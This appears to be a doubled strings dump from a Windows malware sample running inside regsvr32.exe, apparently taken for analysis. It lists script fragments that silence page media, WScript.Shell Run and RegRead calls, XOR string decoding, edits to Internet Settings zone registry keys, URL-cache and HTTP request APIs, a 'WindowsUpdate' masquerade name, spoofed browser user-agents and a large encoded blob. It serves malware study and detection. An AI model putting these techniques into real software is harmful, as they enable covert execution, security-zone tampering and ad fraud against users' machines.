try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
.length;
.length;
=String.fromCharCode(parseInt(
=String.fromCharCode(parseInt(
.substr(
.substr(
,2),16));
,2),16));
=String.fromCharCode(
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt()^
,1).charCodeAt());
,1).charCodeAt());
.length-1)?
.length-1)?
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
12_12_12
12_12_12
psapi.dll
psapi.dll
HTTP/1.1
HTTP/1.1
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
0123456789
Mozilla
Mozilla
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
@.reloc
@.reloc
222.dll
222.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
version.dll
version.dll
gdi32.dll
gdi32.dll
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ole32.dll
ole32.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
atl.dll
atl.dll
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
4"4,414?4
4"4,414?4
4,41494^4
4,41494^4
6%6X6v6
6%6X6v6
0%0-0e0m0u0}0
0%0-0e0m0u0}0
6v7U7\7j7
6v7U7\7j7
2QmAhnpu8fcGUPYZyHeQyChZMoQ/D5d5AZr0RMKkXSBpgoUeQA68kGNIt5xXrV6o8QS8z0K4M8/acNmHet3lgIpPfrM3KHMJVLHZV5gnlYIpq 3Std7mjXltyWOmlU01mcpaju/he1E2Lz04lkhk4ZVxPeg8DJMsTwXfEuMRo4pdRHI0NadevziCU4xjImH/yoUssKerbXMn1wMORwlp/k0 VVrGyYSi4vdLFS3UlXgbi1095arJ1fxvwbnnkviDbAcwVpdWbk 2DklaltjFVzYEU5 2iYATMPlxyE8aSpdfm/SECMCEd244OvjLbc39VZhixL6gBxt4 CnPjHQDoKsoiFZfDyvSE1iwVxoacXcReLFkhoWojYggw3ep Hhk1fFrZWukcbDRTysyv4A RV0UvVSiLsWRR5x1Q6TCMH9JLuCmg165bGfo5b0K0LNDkwOZYhhy1i2qIVkvrmwb9r1Jga8ezq 3dis40etEfUBKCKEphbjj7OhN//CNc0l 73xqZrpYNfV6sAlZvdg95xbgvnsjAMqrsn9mGidK 0QlV2ndhTdo7G3y93rYEcmeR8I18yzTGloiKWTC5 t5PptwGlywmqQTrAc85b6yvfh7pz/ xRwLfLGZtQpvpgeognCnQVctWgg8tJ24W8sytOHljZ5M5LSNO133on8yS40zNvYIu4sDcbQ WmDEL0ZGF EQiG6FyxUotVY LsAh/gH9MWC6mU0Wd3ZgehfYWzSTTfjjqKQLyo9DnEsw8NGN5mDI2vvNqxmB13E2I /4JpjW8UZbcHj6CTf2yBWAllS3cIGKS7RhsQ6KtsLTZFqPzHiQQJ08tG0Wc5UIH r9CgaTkAZUoPZ1GeSNBBHinj3owfCFkhHSIOnL7xFDJRYhlC6Ozw/do2V8/tFGMmApiBcKA3fabVwTpBWKL/zH6QpTSqYfJ6FeFwLoIhMLhSaQHcoGUJDhjwiELkqPL8DzEKSDaJpkDdeUnnYmixASN BvhpyyD XtW6udDeLIdWGSXrXbK43XFT58KWGP/Ae213bAGSGezZWFuw9EPRblSqqaZtk4moTw/etWmK58MKzQmaoc2XI0g1IEg4/l4q0 uYFooQFoVZ8a6/G2gM4uBpKGjj1CF1RWNxoId/FFEg8s2Ppg62D2Mcpe xI3n9eh3sXIYoLTlHEJB8KQi6/LCbDhUO0N5SsgwaLxWhy1lo1f38VhLX5x8kDXMJDETRpwPGoUojilI7bYbFfYR6Ylrl8pdBf9zHbho4zif23dQACP99TXtSUwQXD8xp3jsbDDdeL1hK7ioOndBDpLClwpvCSHwh52OPzdx9N3 Wk/XqDDgRxhMesca 0S2DM9 kZubOrLoiAgX9o1CcsMn9eIY zLWsTazbdNPvEUNj6SKJIjRVnKZltFsKUkPOdgUHk/j05chZ24pbF20a3pNdXvNoEAShCaMyfJV2v/0WE02YcJw8rVpriebDi3dPjCn0S baITraQLe5yAXpB5LXLzAvvGwvDSBsVpp8u8H2UVC97KSX3N42CxO61VFmPxWHApPqLSGQw30DHSV/nfVEAfKR3YMOFRWvwmfbIFKl4l0siRF3LNOPowDEUNvFypVzaPOkYxeIZVT3x8h6ZTC2ldtbx984jHuMCuY1lY5xaUMWtuvBP4HYonozcjueFSS9dceXJ2LDTdC8fppm/q8yhQOT/i2m096Fv5Jk3swvPtGyiWW8LEkjwIhaI7aLSlfC00KSDl9UpCRdrYFVg0mtJIxoJiw76B66wNirFwVWTsAqviTPweIumnhKdRVRyPVGbmlKfaDqwz8xS9yM2C5dxazuQBmUwOWfDICcyXLyDpLFAnEOvC1TJ99bFBIB2W29wz11XU3EHkrQ8tTocRVE8Ewz QHCJLxF e3n85lsPxHBYmweu6b06GOipn0B9AbHaRKnZNB3orJnjT5bgnGJfnbWJ0MkH4y/H7vhLw 3z30b6Rx8RAeMhwmpsmZOHWPKZKKGJ2401ZIcESIkw XRajBY3o5lhHlCoe8eDQwP MhPHhC15i/k8A9jW6PId23MPyzLMRABYvVW7ObyisEWeIcvNZuhNnPZqAwbfVNujSyyzCY5lHnAQhBjIQWdbd GHZYC/a sXVkmkcMoEJC9/wCMLn0bYSLmNyyXjbI1gt njxbQB5kPyflr/IWNkdyo37FBg9Bj9aTTkLcnZMA/lKUQqiLksyx1md6EFapDKrpfI1OTVeqAli17WDBVF1P4kTsTdFs1oSKb2yssAlFuW4ADQ80ccCUPD4PpCBsteHKT5O4qtiS8wVanr3bzCsQzIvj1JQk/Vs7ta4yRPjXYlC/QSviTL9oEKh3vNQZv/9SEZocqBAMSQni0RdlMtc/1UDWBH8 rApgq69I3LLe75NC/R/t3B8WffKF0Xwg qqhNUNue6vzmD1/r3a4RtGgDGifuiQ FmF4NACyciA9I 90 KjaEHSbZ02T6cqGIjvAERyepxBIegZPAMdRN0hM0JZAm6t42jzUyn4cJAlRDY7PbeP7A3etyY694guefwC6cRF3djZhAUKau2MqoSIlM9ZfHcMlIy0ju1lTn6TuiHVqFMEoZl9FFO0sPW5MmRn7aUgQVq644zEQ4ZinDTpvROeVeCTgPOOZjo6DiMtwwwTs7EWT7AVn3 f7uSDPLw6hTx9baJJ88ZvSTMeloTZz8uhjig4Fr8H7ZhjhrdtToS/Uvvan980QyoLlwvutx7zkLAwzU8ZFyJeYNVCreppmX1ERsc3nXs3 q4P8l1aUVKcSdqQWbz/PC4N9nD608OoOXDlRzxG6 VJZ7/eqS9MX5JAASOMrZ1RLZ iFfKeeue5hoJVXb2vFiUlWzDQ5/FSXR 8KYdQRg2xuRHnhOWtXG0oxmXmcIOinppThzK NGKHZEG5ZbiqrB6AhMvqv8GpaLs5ZFH/9hzd8HUQLgOUKDRoVVqgbXhCApa/GrcLXat5BE rkXKNa dsIJbpjppZ1xZ3nZ1rC7MO1qfm9//ymApylmBnXXv5IfrFR/teh HbaCUYl17xjZoOoeMUqOvS73bzixbywl97l ecwB PIrq0ftaliY2PL39/4bINwRfjvgdTjOLX2naBQIA8WcangImCoYH4wUXjmVRPSJh4foNftFtUrxT MkaC4Oeu1NqENQNPxmUgnYo8F9YDcnBIz4pZatOStPT2vdDfVL4Fag9RkB F7B5aprbDoTEBTbX9mAamCjOZ/0wurCeaP JAsNPrp3lUCbtWuKKp9w8X7w0i7nEmad6RLEh2DayCf0eJKV1R/5agf4Gvc5aiC2xRp4WQhnjoCs4vrNZbpCyifRoA4rjxxD S5FuxwrGYlcy7zkbcOaQsWiRSZBo9spuic/mjkhlbIp8GzaPU0uIXjfL6d8Ulq9KPhHlb9r/oHwgCBuTOup4Q2uoqM9jvYw1i7MoIv3RRf8YzVSCRw QlJXcaHHnqdDnhPaBNBh4mkzQ fRblsl4LdoJc1YFTF56Dm ZvOEZH1j7hGNkRs2akeGX6vHvSn3E0c5s wFrbDjD gvl6v/e414Xvog3K7sY1yGxGrIOtt5POiG4o/FtEFmkZCtgfEepTnnLdbzZoONhzywCN75 T6usIuaFeiinI/m4z9 7nIT oDlaEtGwwzDAadqvZAmzRzNTCcU3Ykt4xIh7C1y25K7iYFzoEsWHxQKdPGT3Zgmm28qIC 7/dAwvl asVNW7VWPbdMBQABK DB4d8md3yKri/f1KPH2yY3Jry3zkl/EqJPUeSO3fDSJUDWEwe 4k0QveWcNr9KchSnnhL4TNzJxnHnRsjunajxd8qc4HuWHDMjdzanWIpyMEFajntapZgNscR8ZHk699SW3GuJvykAjM/ZDyOCXmFGgWvW7/xLelvAG7pp9lThSwDaiD6EQT4xByqM7rctSPvOH1h6Kzc78CppXNWdn1ev4d49Vs/NJOf0I9mTOe XKF/sZM4daZVTt/CTivlhbMQiSKnI 2LchxwtU071RcSAKBC0N4aYagIEENLxEtbywgBBTsT hfUgfyPFzQLhgVT87NLcOWApc/r7IyiPZlcKRW9vWk y44xujeKVkmSMj1ck6X3G3cGD4qmm8EFWnc9CKOi9nSDz4Kbe34YCeJ WsMcEEBFeg93eNLg urf251uE2J4prpE5HL17sIA629h8hJ3HpsJ85e7oH5tvxRAprcKP76/lGv3KitfWcPpjDXHRzL86xpn543GPrilrlCTqqsgaB3FZqXiBMxjruFf3J80feF4i0pR 8ThAXGFADwY5VtNlc6QDxP27HwViApoLpM63D47xX1CtZcwM2L4tLBEjlgzGOMTVBmhgt9QO2visWAb2VN0Wm vM8VHLWeaUcVSrwqx9C4l4QylCmgUKQC/lMjiu bAKJWC0dyeETqhOnpdWzvjS5FS15 4KfpV4ZLhuzbaZvDaaJVyXIH8QE0j3mU/xrd98c8/SSLgAGeIdIoQfCA7FL0n30qFhhMv1a9Wv1xByL3h4j7dx2hTOhhSN1MFvbyou7nl9C4K77Ia cWuKk cOmJaKylkfX0JQEknlPC0q9c0jLzL xGRE2c0CSDKYe5GNC9YYRNHGN6PurACw2eQvSdUpsgaHSHhB8NydtTWZiIw8 bnITKflQKh9WzPAD7GRoa9joLy nKlyz1FUb/RVfQydCKMp5IGBYHAr8lNe6Hs7QkuWBVCZGDqV74zeVeAeZxkSaO6ABPhHXrhRttyYJKaa2e16xapeB/shfFVG/S8geyqXdQrVlR/m/1YtijOiIi0oBFln5TMLnemc6isRdJBZcp3PbAtVbXhfykb2/ZbxjFz2/i/q09UxOlqIL4nlNg8ppu40jRax c5QB3sfHJoMSgZa5sGK7iYGiWpXdBTM0TK0yc3F8FxuO1yIDnxVBeBj02N3cHBPVOdDS7FrLGDh5A3G4C4sGIbx3DmUe7snKiuvBx92eSI1bXQXVC8lMGuv9/dMI0W4aTyLdWAmWHT2nhQbS9/BcSXwcxXr8dMGjTXwQuTFPjyye3y/MhIz5R25k41zAkKayv/PVlYFXxOoovMCoUnfyOme20vlz3gPr0/EItd09L8FpoyEcSj1Qj3m eIs5d2jum1KPOYceU2941phMmFrAkJLZ2M7lBjsGzUIz36ulPVqiU7vDekBF3DardgJTGlVpgjsKTICwrR7b9VniFnBKfQX5rMT9vpLZXon7RNZJtjqe2qYMR2RdDZq2ra0lDffFxNmmGuTgQI6qgNLYERXc4l93/Y/RTplukg/u/kYWAf3wZIITfMXtHWqb8PzT5UmJynu4D2eQyoVRDFlkil7gG1DcSZGYdFsqKdPH4tSMOTJwYtkePYtwHGYKYL71CLlFeAPvJzOWzrOxRLfVe1lpkVpMPNcwY5jpM/h/wQMjoP3nVA7EEe2Rc/F7iLg7FeQFL15NYBjqs chgAxTO BDi31uCMPydHfs 72ggtPK1alJWlWV6/2amM0La0lj3eLOjwlOPoM/JCcuRPBIOOGILxHzfzQAcKlJ8N0 7U1eT50jitTLcIhqonwYgawzChExnjbljE3PlCn/yh7oXKyEPqDOUqpPlOdcXdygHqhPkryZ Oyq08RTe/buhaS s3aG40izuACX4lGAo4Vwtc99zVRkOKQztZ9hxSPmdvoogKkh6O0PoUXGhcWQGVcYo2yHU6w9CfydV7E8Cm2ynUbEEiOaPXois6s CeNRPC1VWusBNZ9lA3vY/7zB yGfYy5RZjXNZOqq8NHzdvZx1gqF2zNdPbN67Ze61iqdMupKURgLQbXCLTZ8P8ir3w9z0w9dxydkSrTwLI9wmqgw5fpFnevAV39oJsAyf5GJcIIcPKeG8rU6DkVDXZWI6BBimF2HBnnbYsNN/RXwd5fLLMLyUe5mkouZS4 XE2BmjIbWVno1TVoRSZqXZFAI108Sqy94zD2m8auf/n7edAA0bErhMR m6bSIGVD7YDgp3vIkGe/QFTiY2rzjC7ZhQ2yIITwA8fSKD7VQC/ZAzgixqrl4jL2muO9s wUYDGkxgUviFQlDNEPHk8 RlgMPew/L1eYhiJV NuSRdmLE2/rQfQ zBzdNg7RCmPjx132S40XtOwDfy1eLmV47Y1v/r/gdFKETzVNd5IXo21URoSVXiQZAnpih/4wqMqFfAHaiyIJ/pd9Rci5AbEaFDngNoGsOZ Xuyv5HPOZM1mNoXyoPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
2QmAhnpu8fcGUPYZyHeQyChZMoQ/D5d5AZr0RMKkXSBpgoUeQA68kGNIt5xXrV6o8QS8z0K4M8/acNmHet3lgIpPfrM3KHMJVLHZV5gnlYIpq 3Std7mjXltyWOmlU01mcpaju/he1E2Lz04lkhk4ZVxPeg8DJMsTwXfEuMRo4pdRHI0NadevziCU4xjImH/yoUssKerbXMn1wMORwlp/k0 VVrGyYSi4vdLFS3UlXgbi1095arJ1fxvwbnnkviDbAcwVpdWbk 2DklaltjFVzYEU5 2iYATMPlxyE8aSpdfm/SECMCEd244OvjLbc39VZhixL6gBxt4 CnPjHQDoKsoiFZfDyvSE1iwVxoacXcReLFkhoWojYggw3ep Hhk1fFrZWukcbDRTysyv4A RV0UvVSiLsWRR5x1Q6TCMH9JLuCmg165bGfo5b0K0LNDkwOZYhhy1i2qIVkvrmwb9r1Jga8ezq 3dis40etEfUBKCKEphbjj7OhN//CNc0l 73xqZrpYNfV6sAlZvdg95xbgvnsjAMqrsn9mGidK 0QlV2ndhTdo7G3y93rYEcmeR8I18yzTGloiKWTC5 t5PptwGlywmqQTrAc85b6yvfh7pz/ xRwLfLGZtQpvpgeognCnQVctWgg8tJ24W8sytOHljZ5M5LSNO133on8yS40zNvYIu4sDcbQ WmDEL0ZGF EQiG6FyxUotVY LsAh/gH9MWC6mU0Wd3ZgehfYWzSTTfjjqKQLyo9DnEsw8NGN5mDI2vvNqxmB13E2I /4JpjW8UZbcHj6CTf2yBWAllS3cIGKS7RhsQ6KtsLTZFqPzHiQQJ08tG0Wc5UIH r9CgaTkAZUoPZ1GeSNBBHinj3owfCFkhHSIOnL7xFDJRYhlC6Ozw/do2V8/tFGMmApiBcKA3fabVwTpBWKL/zH6QpTSqYfJ6FeFwLoIhMLhSaQHcoGUJDhjwiELkqPL8DzEKSDaJpkDdeUnnYmixASN BvhpyyD XtW6udDeLIdWGSXrXbK43XFT58KWGP/Ae213bAGSGezZWFuw9EPRblSqqaZtk4moTw/etWmK58MKzQmaoc2XI0g1IEg4/l4q0 uYFooQFoVZ8a6/G2gM4uBpKGjj1CF1RWNxoId/FFEg8s2Ppg62D2Mcpe xI3n9eh3sXIYoLTlHEJB8KQi6/LCbDhUO0N5SsgwaLxWhy1lo1f38VhLX5x8kDXMJDETRpwPGoUojilI7bYbFfYR6Ylrl8pdBf9zHbho4zif23dQACP99TXtSUwQXD8xp3jsbDDdeL1hK7ioOndBDpLClwpvCSHwh52OPzdx9N3 Wk/XqDDgRxhMesca 0S2DM9 kZubOrLoiAgX9o1CcsMn9eIY zLWsTazbdNPvEUNj6SKJIjRVnKZltFsKUkPOdgUHk/j05chZ24pbF20a3pNdXvNoEAShCaMyfJV2v/0WE02YcJw8rVpriebDi3dPjCn0S baITraQLe5yAXpB5LXLzAvvGwvDSBsVpp8u8H2UVC97KSX3N42CxO61VFmPxWHApPqLSGQw30DHSV/nfVEAfKR3YMOFRWvwmfbIFKl4l0siRF3LNOPowDEUNvFypVzaPOkYxeIZVT3x8h6ZTC2ldtbx984jHuMCuY1lY5xaUMWtuvBP4HYonozcjueFSS9dceXJ2LDTdC8fppm/q8yhQOT/i2m096Fv5Jk3swvPtGyiWW8LEkjwIhaI7aLSlfC00KSDl9UpCRdrYFVg0mtJIxoJiw76B66wNirFwVWTsAqviTPweIumnhKdRVRyPVGbmlKfaDqwz8xS9yM2C5dxazuQBmUwOWfDICcyXLyDpLFAnEOvC1TJ99bFBIB2W29wz11XU3EHkrQ8tTocRVE8Ewz QHCJLxF e3n85lsPxHBYmweu6b06GOipn0B9AbHaRKnZNB3orJnjT5bgnGJfnbWJ0MkH4y/H7vhLw 3z30b6Rx8RAeMhwmpsmZOHWPKZKKGJ2401ZIcESIkw XRajBY3o5lhHlCoe8eDQwP MhPHhC15i/k8A9jW6PId23MPyzLMRABYvVW7ObyisEWeIcvNZuhNnPZqAwbfVNujSyyzCY5lHnAQhBjIQWdbd GHZYC/a sXVkmkcMoEJC9/wCMLn0bYSLmNyyXjbI1gt njxbQB5kPyflr/IWNkdyo37FBg9Bj9aTTkLcnZMA/lKUQqiLksyx1md6EFapDKrpfI1OTVeqAli17WDBVF1P4kTsTdFs1oSKb2yssAlFuW4ADQ80ccCUPD4PpCBsteHKT5O4qtiS8wVanr3bzCsQzIvj1JQk/Vs7ta4yRPjXYlC/QSviTL9oEKh3vNQZv/9SEZocqBAMSQni0RdlMtc/1UDWBH8 rApgq69I3LLe75NC/R/t3B8WffKF0Xwg qqhNUNue6vzmD1/r3a4RtGgDGifuiQ FmF4NACyciA9I 90 KjaEHSbZ02T6cqGIjvAERyepxBIegZPAMdRN0hM0JZAm6t42jzUyn4cJAlRDY7PbeP7A3etyY694guefwC6cRF3djZhAUKau2MqoSIlM9ZfHcMlIy0ju1lTn6TuiHVqFMEoZl9FFO0sPW5MmRn7aUgQVq644zEQ4ZinDTpvROeVeCTgPOOZjo6DiMtwwwTs7EWT7AVn3 f7uSDPLw6hTx9baJJ88ZvSTMeloTZz8uhjig4Fr8H7ZhjhrdtToS/Uvvan980QyoLlwvutx7zkLAwzU8ZFyJeYNVCreppmX1ERsc3nXs3 q4P8l1aUVKcSdqQWbz/PC4N9nD608OoOXDlRzxG6 VJZ7/eqS9MX5JAASOMrZ1RLZ iFfKeeue5hoJVXb2vFiUlWzDQ5/FSXR 8KYdQRg2xuRHnhOWtXG0oxmXmcIOinppThzK NGKHZEG5ZbiqrB6AhMvqv8GpaLs5ZFH/9hzd8HUQLgOUKDRoVVqgbXhCApa/GrcLXat5BE rkXKNa dsIJbpjppZ1xZ3nZ1rC7MO1qfm9//ymApylmBnXXv5IfrFR/teh HbaCUYl17xjZoOoeMUqOvS73bzixbywl97l ecwB PIrq0ftaliY2PL39/4bINwRfjvgdTjOLX2naBQIA8WcangImCoYH4wUXjmVRPSJh4foNftFtUrxT MkaC4Oeu1NqENQNPxmUgnYo8F9YDcnBIz4pZatOStPT2vdDfVL4Fag9RkB F7B5aprbDoTEBTbX9mAamCjOZ/0wurCeaP JAsNPrp3lUCbtWuKKp9w8X7w0i7nEmad6RLEh2DayCf0eJKV1R/5agf4Gvc5aiC2xRp4WQhnjoCs4vrNZbpCyifRoA4rjxxD S5FuxwrGYlcy7zkbcOaQsWiRSZBo9spuic/mjkhlbIp8GzaPU0uIXjfL6d8Ulq9KPhHlb9r/oHwgCBuTOup4Q2uoqM9jvYw1i7MoIv3RRf8YzVSCRw QlJXcaHHnqdDnhPaBNBh4mkzQ fRblsl4LdoJc1YFTF56Dm ZvOEZH1j7hGNkRs2akeGX6vHvSn3E0c5s wFrbDjD gvl6v/e414Xvog3K7sY1yGxGrIOtt5POiG4o/FtEFmkZCtgfEepTnnLdbzZoONhzywCN75 T6usIuaFeiinI/m4z9 7nIT oDlaEtGwwzDAadqvZAmzRzNTCcU3Ykt4xIh7C1y25K7iYFzoEsWHxQKdPGT3Zgmm28qIC 7/dAwvl asVNW7VWPbdMBQABK DB4d8md3yKri/f1KPH2yY3Jry3zkl/EqJPUeSO3fDSJUDWEwe 4k0QveWcNr9KchSnnhL4TNzJxnHnRsjunajxd8qc4HuWHDMjdzanWIpyMEFajntapZgNscR8ZHk699SW3GuJvykAjM/ZDyOCXmFGgWvW7/xLelvAG7pp9lThSwDaiD6EQT4xByqM7rctSPvOH1h6Kzc78CppXNWdn1ev4d49Vs/NJOf0I9mTOe XKF/sZM4daZVTt/CTivlhbMQiSKnI 2LchxwtU071RcSAKBC0N4aYagIEENLxEtbywgBBTsT hfUgfyPFzQLhgVT87NLcOWApc/r7IyiPZlcKRW9vWk y44xujeKVkmSMj1ck6X3G3cGD4qmm8EFWnc9CKOi9nSDz4Kbe34YCeJ WsMcEEBFeg93eNLg urf251uE2J4prpE5HL17sIA629h8hJ3HpsJ85e7oH5tvxRAprcKP76/lGv3KitfWcPpjDXHRzL86xpn543GPrilrlCTqqsgaB3FZqXiBMxjruFf3J80feF4i0pR 8ThAXGFADwY5VtNlc6QDxP27HwViApoLpM63D47xX1CtZcwM2L4tLBEjlgzGOMTVBmhgt9QO2visWAb2VN0Wm vM8VHLWeaUcVSrwqx9C4l4QylCmgUKQC/lMjiu bAKJWC0dyeETqhOnpdWzvjS5FS15 4KfpV4ZLhuzbaZvDaaJVyXIH8QE0j3mU/xrd98c8/SSLgAGeIdIoQfCA7FL0n30qFhhMv1a9Wv1xByL3h4j7dx2hTOhhSN1MFvbyou7nl9C4K77Ia cWuKk cOmJaKylkfX0JQEknlPC0q9c0jLzL xGRE2c0CSDKYe5GNC9YYRNHGN6PurACw2eQvSdUpsgaHSHhB8NydtTWZiIw8 bnITKflQKh9WzPAD7GRoa9joLy nKlyz1FUb/RVfQydCKMp5IGBYHAr8lNe6Hs7QkuWBVCZGDqV74zeVeAeZxkSaO6ABPhHXrhRttyYJKaa2e16xapeB/shfFVG/S8geyqXdQrVlR/m/1YtijOiIi0oBFln5TMLnemc6isRdJBZcp3PbAtVbXhfykb2/ZbxjFz2/i/q09UxOlqIL4nlNg8ppu40jRax c5QB3sfHJoMSgZa5sGK7iYGiWpXdBTM0TK0yc3F8FxuO1yIDnxVBeBj02N3cHBPVOdDS7FrLGDh5A3G4C4sGIbx3DmUe7snKiuvBx92eSI1bXQXVC8lMGuv9/dMI0W4aTyLdWAmWHT2nhQbS9/BcSXwcxXr8dMGjTXwQuTFPjyye3y/MhIz5R25k41zAkKayv/PVlYFXxOoovMCoUnfyOme20vlz3gPr0/EItd09L8FpoyEcSj1Qj3m eIs5d2jum1KPOYceU2941phMmFrAkJLZ2M7lBjsGzUIz36ulPVqiU7vDekBF3DardgJTGlVpgjsKTICwrR7b9VniFnBKfQX5rMT9vpLZXon7RNZJtjqe2qYMR2RdDZq2ra0lDffFxNmmGuTgQI6qgNLYERXc4l93/Y/RTplukg/u/kYWAf3wZIITfMXtHWqb8PzT5UmJynu4D2eQyoVRDFlkil7gG1DcSZGYdFsqKdPH4tSMOTJwYtkePYtwHGYKYL71CLlFeAPvJzOWzrOxRLfVe1lpkVpMPNcwY5jpM/h/wQMjoP3nVA7EEe2Rc/F7iLg7FeQFL15NYBjqs chgAxTO BDi31uCMPydHfs 72ggtPK1alJWlWV6/2amM0La0lj3eLOjwlOPoM/JCcuRPBIOOGILxHzfzQAcKlJ8N0 7U1eT50jitTLcIhqonwYgawzChExnjbljE3PlCn/yh7oXKyEPqDOUqpPlOdcXdygHqhPkryZ Oyq08RTe/buhaS s3aG40izuACX4lGAo4Vwtc99zVRkOKQztZ9hxSPmdvoogKkh6O0PoUXGhcWQGVcYo2yHU6w9CfydV7E8Cm2ynUbEEiOaPXois6s CeNRPC1VWusBNZ9lA3vY/7zB yGfYy5RZjXNZOqq8NHzdvZx1gqF2zNdPbN67Ze61iqdMupKURgLQbXCLTZ8P8ir3w9z0w9dxydkSrTwLI9wmqgw5fpFnevAV39oJsAyf5GJcIIcPKeG8rU6DkVDXZWI6BBimF2HBnnbYsNN/RXwd5fLLMLyUe5mkouZS4 XE2BmjIbWVno1TVoRSZqXZFAI108Sqy94zD2m8auf/n7edAA0bErhMR m6bSIGVD7YDgp3vIkGe/QFTiY2rzjC7ZhQ2yIITwA8fSKD7VQC/ZAzgixqrl4jL2muO9s wUYDGkxgUviFQlDNEPHk8 RlgMPew/L1eYhiJV NuSRdmLE2/rQfQ zBzdNg7RCmPjx132S40XtOwDfy1eLmV47Y1v/r/gdFKETzVNd5IXo21URoSVXiQZAnpih/4wqMqFfAHaiyIJ/pd9Rci5AbEaFDngNoGsOZ Xuyv5HPOZM1mNoXyoPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
WindowsUpdate
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
regsvr32.exe_324_rwx_00080000_0013E000:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
USER32.DLL
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
